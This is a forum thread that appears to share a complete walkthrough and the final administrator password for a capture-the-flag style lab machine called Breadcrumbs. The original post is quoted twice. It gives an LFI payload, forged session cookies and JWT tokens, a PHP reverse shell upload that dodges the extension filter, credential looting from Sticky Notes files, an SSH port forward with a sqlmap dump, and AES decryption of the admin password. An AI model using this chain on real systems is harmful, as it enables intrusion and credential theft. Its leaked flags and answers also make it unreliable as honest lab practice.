FLAG free no credits Breadcrumbs admin ssh + description tutorial
by paulwatson42016 - February 21, 2021 at 02:18 PM
#1
ssh [email protected]
Password: [email protected][email protected]#$9890./

Description

Lfi on books page by and making a post request to search a book, change request and change method variable to 1 and remove title and author and replace with book
book=../index.php&method=1
In get request

Use read files
Find secret key for tokens and php for how cooky are made by looking at files for the portal sign

Read code for cooky. The phpsessid is created by md5 hashing string that has a random letter from the users name
Get Paul phpsessid
paul47200b180ccd6835d25d034eeb6e6390

create a new jwt token using the secret key you found now token is
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjp7InVzZXJuYW1lIjoicGF1bCJ9fQ.7pc5S1P76YsrWhi_gu23bzYLYWxqORkr0WtEz_IUtCU

Login portal with a random account, edit your cookies with the tokens refresh

Now Paul

Go to file management and  upload a php script in a file (maybe like reverseshell.html) and intercept with burpsuite  and change the .zip at the bottom to .php if not work out title and author in like valid book http://10.10.10.228/books

go to http://10.10.10.228/portal/uploads can execute your file and now command execution

Look through folders and find a Juliette
Password

Ssh the box

now need development user
Go to the location on windows where sticky notes are and download the
plum.sqlite
plum.sqlite-shm
plum.sqlite-wal

%LocalAppData%\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState
If directory  not work go to C:\Users and find the directory manually

Open sql (I copied back to my box using SMB)
Get all notes then ssh as development with password in note

Now root
Go to C:\Development
There Linux binary
has useful information inside

Inside there is command and you can see what it does when on box you do

curl 'http://127.0.0.1:1234/index.php?method=select&username=administrator&table=passwords' -UseBasicParsing

 run on box

Gets aes key but can do sqlmaps through the url but port forward so you can do on kali

ssh -N -L 1234:127.0.0.1:1234 [email protected]
curl 'http://127.0.0.1:1234/index.php?method=select&username=administrator&table=passwords'


Run sqlmaps with flag --dump against
http://127.0.0.1/index.php?method=select&username=administrator &table=passwords

gives out put string
H2dFz/jNwtSTWDURot9JBhWMP6XOdmcpgqvYHG35QKw=

With a key
k19D193j.<19391(

Base 64 decode string
After base 64 decrypt do aes decrypt
Use cyberchef with input and output mode raw
Key in Latin and IV in hex (iv =0000000000000000)

You get [email protected][email protected]#$9890./

ssh administrator with password
#2
Thanks for sharing. I was stuck in the last part for decrypting the password.
You can use php's openssl_decrypt to perform the decryption as well!
#3
(February 22, 2021 at 05:52 PM)ra1der1337 Wrote: Thanks for sharing. I was stuck in the last part for decrypting the password.
You can use php's openssl_decrypt to perform the decryption as well!
use cyberchef like this:
https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',false)AES_Decrypt(%7B'option':'Latin1','string':'k19D193j.%3C19391('%7D,%7B'option':'Hex','string':'0000000000000000000000000000000'%7D,'CBC','Raw','Raw',%7B'option':'Hex','string':''%7D,%7B'option':'Hex','string':'undefined'%7D)&input=SDJkRnovak53dFNUV0RVUm90OUpCaFdNUDZYT2RtY3BncXZZSEczNVFLdz0
#4
don't really understand this writeup from the beginning, can someone explain better sorry for disturbing?
#5
(February 21, 2021 at 02:18 PM)paulwatson42016 Wrote: ssh [email protected]
Password: [email protected][email protected]#$9890./

Description

Lfi on books page by and making a post request to search a book, change request and change method variable to 1 and remove title and author and replace with book
book=../index.php&method=1
In get request

Use read files
Find secret key for tokens and php for how cooky are made by looking at files for the portal sign

Read code for cooky. The phpsessid is created by md5 hashing string that has a random letter from the users name
Get Paul phpsessid
paul47200b180ccd6835d25d034eeb6e6390

create a new jwt token using the secret key you found now token is
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjp7InVzZXJuYW1lIjoicGF1bCJ9fQ.7pc5S1P76YsrWhi_gu23bzYLYWxqORkr0WtEz_IUtCU

Login portal with a random account, edit your cookies with the tokens refresh

Now Paul

Go to file management and  upload a php script in a file (maybe like reverseshell.html) and intercept with burpsuite  and change the .zip at the bottom to .php if not work out title and author in like valid book http://10.10.10.228/books

go to http://10.10.10.228/portal/uploads can execute your file and now command execution

Look through folders and find a Juliette
Password

Ssh the box

now need development user
Go to the location on windows where sticky notes are and download the
plum.sqlite
plum.sqlite-shm
plum.sqlite-wal

%LocalAppData%\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState
If directory  not work go to C:\Users and find the directory manually

Open sql (I copied back to my box using SMB)
Get all notes then ssh as development with password in note

Now root
Go to C:\Development
There Linux binary
has useful information inside

Inside there is command and you can see what it does when on box you do

curl 'http://127.0.0.1:1234/index.php?method=select&username=administrator&table=passwords' -UseBasicParsing

 run on box

Gets aes key but can do sqlmaps through the url but port forward so you can do on kali

ssh -N -L 1234:127.0.0.1:1234 [email protected]
curl 'http://127.0.0.1:1234/index.php?method=select&username=administrator&table=passwords'


Run sqlmaps with flag --dump against
http://127.0.0.1/index.php?method=select&username=administrator &table=passwords

gives out put string
H2dFz/jNwtSTWDURot9JBhWMP6XOdmcpgqvYHG35QKw=

With a key
k19D193j.<19391(

Base 64 decode string
After base 64 decrypt do aes decrypt
Use cyberchef with input and output mode raw
Key in Latin and IV in hex (iv =0000000000000000)

You get [email protected][email protected]#$9890./

ssh administrator with password


thank you very much for this
#6
Could you kindly give me more info about the LFI?

I tried to detect through Burp and make the changes that you indicate. But nothing. 

Thanks a lot

(February 21, 2021 at 02:18 PM)paulwatson42016 Wrote: ssh [email protected]
Password: [email protected][email protected]#$9890./

Description

Lfi on books page by and making a post request to search a book, change request and change method variable to 1 and remove title and author and replace with book
book=../index.php&method=1
In get request

Use read files
Find secret key for tokens and php for how cooky are made by looking at files for the portal sign

Read code for cooky. The phpsessid is created by md5 hashing string that has a random letter from the users name
Get Paul phpsessid
paul47200b180ccd6835d25d034eeb6e6390

create a new jwt token using the secret key you found now token is
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjp7InVzZXJuYW1lIjoicGF1bCJ9fQ.7pc5S1P76YsrWhi_gu23bzYLYWxqORkr0WtEz_IUtCU

Login portal with a random account, edit your cookies with the tokens refresh

Now Paul

Go to file management and  upload a php script in a file (maybe like reverseshell.html) and intercept with burpsuite  and change the .zip at the bottom to .php if not work out title and author in like valid book http://10.10.10.228/books

go to http://10.10.10.228/portal/uploads can execute your file and now command execution

Look through folders and find a Juliette
Password

Ssh the box

now need development user
Go to the location on windows where sticky notes are and download the
plum.sqlite
plum.sqlite-shm
plum.sqlite-wal

%LocalAppData%\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState
If directory  not work go to C:\Users and find the directory manually

Open sql (I copied back to my box using SMB)
Get all notes then ssh as development with password in note

Now root
Go to C:\Development
There Linux binary
has useful information inside

Inside there is command and you can see what it does when on box you do

curl 'http://127.0.0.1:1234/index.php?method=select&username=administrator&table=passwords' -UseBasicParsing

 run on box

Gets aes key but can do sqlmaps through the url but port forward so you can do on kali

ssh -N -L 1234:127.0.0.1:1234 [email protected]
curl 'http://127.0.0.1:1234/index.php?method=select&username=administrator&table=passwords'


Run sqlmaps with flag --dump against
http://127.0.0.1/index.php?method=select&username=administrator &table=passwords

gives out put string
H2dFz/jNwtSTWDURot9JBhWMP6XOdmcpgqvYHG35QKw=

With a key
k19D193j.<19391(

Base 64 decode string
After base 64 decrypt do aes decrypt
Use cyberchef with input and output mode raw
Key in Latin and IV in hex (iv =0000000000000000)

You get [email protected][email protected]#$9890./

ssh administrator with password
#7
Thanks for the tips

I found the LFI but I'm having trouble creating the cookie , because of the key format in php

You can send me a dm to not spam this thread ( im new user so i cant send you a dm )

Thanks
#8
thank bro, I want to mention some thing.
(i) LFI not in search you should.
(ii) search book with author t
(iii)intercept request to view book name
(iv) change book=book name to book=../index.php
#9
(March 10, 2021 at 06:49 PM)nonnaru Wrote: thank bro, I want to mention some thing.
(i) LFI not in search you should.
(ii) search book with author t
(iii)intercept request to view book name
(iv) change book=book name to book=../index.php

That's what I put, make post request by searching a book, intercept request and modify method and book parameters
#10
Is someone able to find a detailed writeup? especially on the part of creating JWT!
#11
(March 11, 2021 at 06:45 PM)UltraMagnus Wrote: Is someone able to find a detailed writeup? especially on the part of creating JWT!

It's not difficult use this https://jwt.io/
Just type in the information
#12
(March 12, 2021 at 12:57 PM)paulwatson42016 Wrote:
(March 11, 2021 at 06:45 PM)UltraMagnus Wrote: Is someone able to find a detailed writeup? especially on the part of creating JWT!

It's not difficult use this https://jwt.io/
Just type in the information

I am familiar with JWT's, the part where we create cookie referring the php code is what bugging me.. I do understand the code about how it's creating cookies.. but somehow i am failing to replicate it !

Possibly Related Threads…
Thread Author Replies Views Last Post
SELLING HTB Spider User and Root SSH Keys GunniBusch 2 758 June 09, 2021 at 03:23 AM
Last Post: Drannel
FLAG SPIDER SSH KEYS (USER AND ROOT) FREE xploiter 1 571 June 03, 2021 at 06:42 AM
Last Post: chocolatozo
FLAG Crossfit2 root ssh key, password and shadow hash [NO CREDITS NEEDED] paulwatson42016 11 2,400 May 04, 2021 at 12:44 PM
Last Post: im_RobOT

 Users browsing this thread: 2 Guest(s)